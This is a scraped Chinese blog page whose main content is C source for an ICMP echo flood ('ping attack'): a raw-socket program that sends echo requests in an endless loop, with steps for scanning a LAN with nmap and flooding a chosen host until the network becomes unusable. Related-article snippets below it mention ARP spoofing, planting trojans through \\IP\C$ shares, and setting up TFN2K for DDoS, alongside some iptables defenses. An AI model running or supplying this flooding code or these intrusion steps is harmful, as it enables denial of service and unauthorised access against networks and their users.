ping 攻击 Linux,Linux 环境实现ping攻击

最新推荐文章于 2021-05-21 16:06:01 发布
最新推荐文章于 2021-05-21 16:06:01 发布
阅读量636 收藏 1
点赞数
文章标签: ping 攻击 Linux
本文介绍了如何通过编程实现ping攻击,通过不断地向局域网主机发送ICMP请求,导致网络性能下降。重点讲述了开发环境、程序流程和源码,展示了如何通过`nmap`扫描IP并发起攻击,最终影响整个局域网的使用体验。
摘要由CSDN通过智能技术生成

通过不断的ping局域网中的某个主机,可以达到几乎完全占用那个主机网速的效果,但自己的网速也废了,整个局域网的上网基本上也废来。所以这是一种同归于尽的攻击方式,实用性基本上不存在了。之所以做这件事,是因为最近在研读 TCP/IP详解卷一 这本书,所以用代码实现了ping的功能,并且稍加改进成为了ping攻击的代码。

一、开发环境:Red Hat Enterprise Linux 6.0

编译工具:GCC

二、程序流程:

定义相关全局变量(如套接字socket等)-》根据输入参数获取IP地址 -> 不断发ICMP请求回显包

三、程序源码:

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define PACKET_SIZE 4096//缓冲区大小

struct timeval timeout={5,0};//设置socket超时时间5s

fd_set fds;//文件描述符集合,可以监视该集合的描述符

char sendpacket[PACKET_SIZE];//发送缓冲区

char recvpacket[PACKET_SIZE];//接收缓冲区

int sockfd,datalen=56;//套接字

int nsend = 0,nreceived = 0;//发送和接收计数

struct sockaddr_in dest_addr;//目的IP地址

pid_t pid;//进程ID号

struct sockaddr_in from;//源IP地址

struct timeval tvrecv;//时间结构体

unsigned short cal_chksum(unsigned short* addr,int len);//校验和计算函数

int pack(int pack_no);//打包函数

void send_packet(void);//发送包函数

void tv_sub(struct timeval *out,struct timeval *in);//时间计算函数\

unsigned short cal_chksum(unsigned short* addr,int len)

{

int nleft = len;

int sum = 0;

unsigned short* w = addr;

unsigned short answer = 0;

while(nleft>1)

{

sum += *w++;

nleft -= 2;

}

if(nleft == 1)

{

*(unsigned char*)(&answer) = *(unsigned char*)w;

sum += answer;

}

sum = (sum>>16)+(sum&0xffff);

answer=~sum;

return answer;

}

int pack(int pack_no)

{

int i,packsize;

struct icmp* icmp;

struct timeval* tval;

icmp = (struct icmp*)sendpacket;

icmp->icmp_type = ICMP_ECHO;//请求回显报文

icmp->icmp_code = 0;

icmp->icmp_cksum = 0;

icmp->icmp_seq = pack_no;

icmp->icmp_id = pid;

packsize = 8+datalen;

tval = (struct timeval*)icmp->icmp_data;

gettimeofday(tval,NULL);

icmp->icmp_cksum =cal_chksum((unsigned short*)icmp,packsize);

return packsize;

}

void send_packet()

{

int packetsize;

nsend++;

packetsize = pack(nsend);

FD_ZERO(&fds);//清空描述符集fds

FD_SET(sockfd,&fds);//将sockfd加入描述符集

int ret=select(sockfd+1,NULL,&fds,NULL,&timeout);//监控套接字是否可写,若不能写入,则等待timeout时间,超时返回0,可写返回大于0,发生错误返回负值

if(ret<0)

{

perror("Select Error");

}

else if(ret==0)

{

perror("Send Timeout");

}

else

{

if(sendto(sockfd,sendpacket,packetsize,0,(struct sockaddr*)&dest_addr,sizeof(dest_addr))<0)

{

// perror("sendto error");

}

//sleep(1);

if(nsend==0x7fffffff)

nsend=0;

}

}

void tv_sub(struct timeval* out,struct timeval* in)

{

if((out->tv_usec -= in->tv_usec)<0)

{

--out->tv_sec;

out->tv_usec += 1000000;

}

out->tv_sec -= in->tv_sec;

}

int main(int argc,char* argv[])

{

struct hostent *host;

struct protoent* protocol;

unsigned long inaddr = 0l;

int size = 50*1024;

FD_ZERO(&fds);//清空描述符集fds

FD_SET(sockfd,&fds);//将sockfd加入描述符集

if(argc<2)

{

printf("Please input IP address after ./attack\n",argv[0]);

exit(1);

}

if((protocol = getprotobyname("icmp"))==NULL)

{

perror("getprotobyname");

exit(1);

}

if((sockfd=socket(AF_INET,SOCK_RAW,protocol->p_proto))<0)

{

perror("socket error");

exit(1);

}

setuid(getuid());

setsockopt(sockfd,SOL_SOCKET,SO_RCVBUF,&size,sizeof(size));//设置接收缓冲区大小

setsockopt(sockfd,SOL_SOCKET,SO_SNDBUF,&size,sizeof(size));//设置发送缓冲区大小

bzero(&dest_addr,sizeof(dest_addr));//初始化填充地址结构体

dest_addr.sin_family = AF_INET;

if(inaddr = inet_addr(argv[1]) == INADDR_NONE)//不能从输入参数1直接获取到IP地址

{

if((host = gethostbyname(argv[1]))==NULL)//从主机名获取IP地址

{

perror("gethostbyname error");

exit(1);

}

memcpy((char*)&dest_addr.sin_addr,host->h_addr,host->h_length);

}

else

dest_addr.sin_addr.s_addr = inet_addr(argv[1]);//直接填充IP地址

while(1)

{

send_packet();

}

return 0;

}

四、攻击过程

第一步:利用nmap工具查看局域网内的活跃IP;

第二步:从第一步可以看出活跃的IP,其中192,168.1.112是我的笔记本,程序运行在台式机上,运行生成的程序myping

第三步:在笔记本上检查效果,发现网页根本打不开,时间长了。操作还有点卡,整个局域网上的机子都是这样,所以说同归于尽嘛!

Linux 环境实现ping攻击
Jason___Bourne的专栏
05-02 4501
通过不断的ping局域网中的某个主机,可以达到几乎完全占用那个主机网速的效果,但自己的网速也废了,整个局域网的上网基本上也废来。所以这是一种同归于尽的攻击方式,实用性基本上不存在了。之所以做这件事,是因为最近在研读 TCP/IP详解卷一 这本书,所以用代码实现ping的功能,并且稍加改进成为了ping攻击的代码。 一、开发环境:Red Hat Enterprise Linux 6.0
攻击局域网计算机,如何攻击局域网电脑
weixin_30803191的博客
07-24 5607
如何攻击局域网电脑?1.知道到他的IP,然后在运行里面打上\\IP\C$,需要打用户名和密码,用户名打administrator,除非他没设置密码,你可以直接进入,然后可以任意改他C盘里面的东西,甚至直接放木马进去.2.ping 他的IP,只要你知道对方的IP就在开始-运行-ping 192.168.1.*就的行了挖,嘿嘿哈,他CPU就利用了100%了,嘿嘿3.直接用 局域网终结者4.用ADSL...
linux禁止ping, 服务器防止ping拒绝服务网络攻击
phpxxo的博客
06-10 2730
linux禁止ping, 服务器防止ping拒绝服务网络攻击为了服务器的安全, 防止网络攻击(DOS 攻击消耗网络宽带,CPU资源), 需要服务器设置 禁止ping通常有两种方式第一种是通过防火墙 iptables 设置第二种是内核设置 如果内核禁止ping , 防火墙设置允许ping 也是ping不通,内核设置允许ping, 防火墙设置不允许ping , 也是不能ping的第一种: 通过防火墙设...
Linux下禁止ping最简单的方法
white__cat的专栏
07-03 2412
ping是一个通信协议,是ip协议的一部分,tcp/ip 协议的一部分。利用它可以检查网络是否能够连通,用好它可以很好地帮助我们分析判定网络故障。应用格式为:Ping IP地址。但服务启用ping有时候会造成很多麻烦。   因此有时候根据需要(如防止攻击),Linux服务器管理员可限制服务器禁止其它用户Ping。同时又保证Linux服务器又可以Ping其它服务器。 下面介绍linux
linux仿ping攻击,linux 下 iptables 防止 syn ddos ping 等 攻击
weixin_39807352的博客
05-13 361
先来一个自己用的实例:配置防火墙防止syn,ddos攻击[root@m176com ~]# vim /etc/sysconfig/iptables在iptables中加入下面几行#anti syn,ddos-A FORWARD -p tcp --syn -m limit --limit 1/s --limit-burst 5 -jACCEPT-A FORWARD -p tcp --tcp-flag...
linux实现ping
12-20
程序linux实现简单的ping命令,运行程序即可运行。程序内附注释
linuxping程序.rar_linux_linux ping _linux ping pudn_ping linux
09-24
本教程将深入探讨`ping`程序Linux环境下的使用,以及其在学习网络基础知识时的价值。 首先,让我们理解`ping`命令的基本语法: ```bash ping [选项] 目标地址 ``` 其中,目标地址可以是IP地址或域名。`ping`命令...
Linux下指定源ip进行ping操作的方法
09-15
本文将详细讲解如何在Linux环境下通过指定源IP进行ping操作。 在传统的ping命令中,我们通常只输入目标IP地址,如`ping 192.168.1.1`,这时系统会自动选择一个可用的网络接口进行通信。然而,在多网卡环境中,这...
linux中c语言实现多线程ping命令
02-08
c语言实现linux下多线程ping命令,可以ping一个网段,格式为./XX 14.215.177.38 14.215.177.40(以百度ip地址为例)
Linux如何防止ping攻击,iptables 如何防止 syn ddos ping 攻击
weixin_39891158的博客
05-14 260
该楼层疑似违规已被系统折叠隐藏此楼查看此楼配置防火墙防止syn,ddos攻击[root@m176com ~]# vim /etc/sysconfig/iptables 在iptables中加入下面几行 #anti syn,ddos -A FORWARD -p tcp --syn -m limit --limit 1/s --limit-burst 5 -j ACCEPT -A FORWARD ...
linux ddos攻击ip,Linux操作系统中实现DDOS攻击的方法
weixin_28746327的博客
05-10 551
软件用的是最有名的DDOS,首先说我们用来攻击的客户机和服务器的配置方法,使用当下最有名的REDHATLinux进行测试,本次攻击测试我使用的是FEDORA CORE3。开始设置服务器:解压 tar -zxvf tfn2k.tgz1.安装TFN2KTFN2K为开放原代码的软件,所以需要我们进行编译,这个不用说了,编译应该都会的吧,但有几个地方是必需注意的,因为使用不同版本和厂商的Linux需要不同...
Linux 下的网络攻击
热门推荐
xk的博客
03-06 1万+
学习了虚拟机的linux系统,想玩点有意思的,没错就是攻击,给大家教一个简单的arpspoof攻击这种攻击会将对方电脑卡的掉线,注意这种操作是在同一局域网下的操作。接下来说一说具体的步骤第一步 安装 sudo apt-get install dsniff ssldump,看不懂不要紧,这个命令就是为了能启动arpspoof 方便arpspoof攻击第二步 要知道 ip 和 默认网关  在这里我先以...
linux ping 死,Linux内核安全详解 "ping到死"复活方法
weixin_36317492的博客
05-14 211
对于电脑用户来说,Windows的强大功能服务了广大用户, 不过Windows安全问题还是让很多人头疼,所以很多人开始应用Linux,不过Linux内核安全也不能疏忽,今天就讲讲Linux内核安全问题清理。Linux内核 内核安全Windows的安全问题比谷仓里的跳蚤还要多,但Linux也未必就对自身的安全漏洞免疫。最近有两个明显的bug被发现,不过很快就修好了。为了保证你不受困扰,你需要尽快地为...
Linux网络编程之ICMP洪水攻击
02-19 2376
1. ICMP洪水攻击原理 ICMP洪水攻击基于PING协议,通过发送大量的PING包来攻击目标主机,主要攻击有3类: (1)直接洪水攻击,即通过多线程的方式一次性发送大量的ICMP包,其缺点是容易暴露,对方知道你的IP,可以直接屏蔽 (2)伪装IP攻击, 在直接洪水攻击的基础上,将发送方的IP地址用伪装的IP地址来代替 (3)反射攻击, 伪装目标主机向一群主机发送ICMP请求包,这样,这
死亡之 Ping
AIwenIPgeolocation的博客
04-12 2008
死亡之 Ping 攻击是一种 拒绝服务 (DoS) 攻击攻击者旨在通过发送大于最大允许大小的数据包来破坏目标计算机,从而导致目标计算机冻结或崩溃。原始的死亡之 Ping 攻击如今并不常见。称为 ICMP 洪水攻击的相关攻击更为普遍。 死亡之 Ping 如何工作? Internet 控制消息协议 (ICMP) 回显回复消息或 “ping” 是用于测试网络连接的网络实用程序,其工作原理类似于声纳 – 发出“脉冲” 而该脉冲发出的“回显”告知操作员有关环境的信息。如果连接正常,则源计算机收到来自目标计.
局域网常见攻击方式原理
渗透测试
05-21 5696
文章目录前言一、ARP欺骗1.查看arp表2.arp原理3.arp欺骗过程二、DNS欺骗三、DDos攻击总结 前言 简单介绍了常见的局域网攻击方式 一、ARP欺骗 局域网不是根据ip地址,而是根据MAC地址进行传输。破坏MAC地址,会影响传输。例如,MAC地址在A上伪造一个不存在的MAC地址,A不能pingC,这就是简单的ARP欺骗。 1.查看arp表 kali使用arp查看,windows使用arp -a查看 ┌──(root????kali)-[~] └─# arp Address
浅谈Ping 攻击
G_host的专栏
08-18 9210
前述:由于本人还不是菜鸟而且技术学识方面浅。故不能用专业术语来描述,请谅解。我们上网冲浪的时候,或许防火墙突然报警“禁止XXX IP 进入”。其实在默认的情况下,我们的防火墙是绝对禁止PING进入的。至于PING 攻击者的方法,他可能是利用攻击器来进行攻击,但也可能是用 DOS 里的PING命令来进行的。。。。。。对于别人PING攻击的目的,我们很难预测。。。。。。然而好多时候PING攻击者是
局域网嵌入式Linux下的批量ping实现技术
8. 编程实现ping功能: 在嵌入式Linux系统中实现ping功能通常涉及到编程实现。开发者需要了解网络编程的基础知识,例如使用socket编程接口,以及如何发送和接收ICMP协议的数据包。此外,还需要熟悉嵌入式Linux系统的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值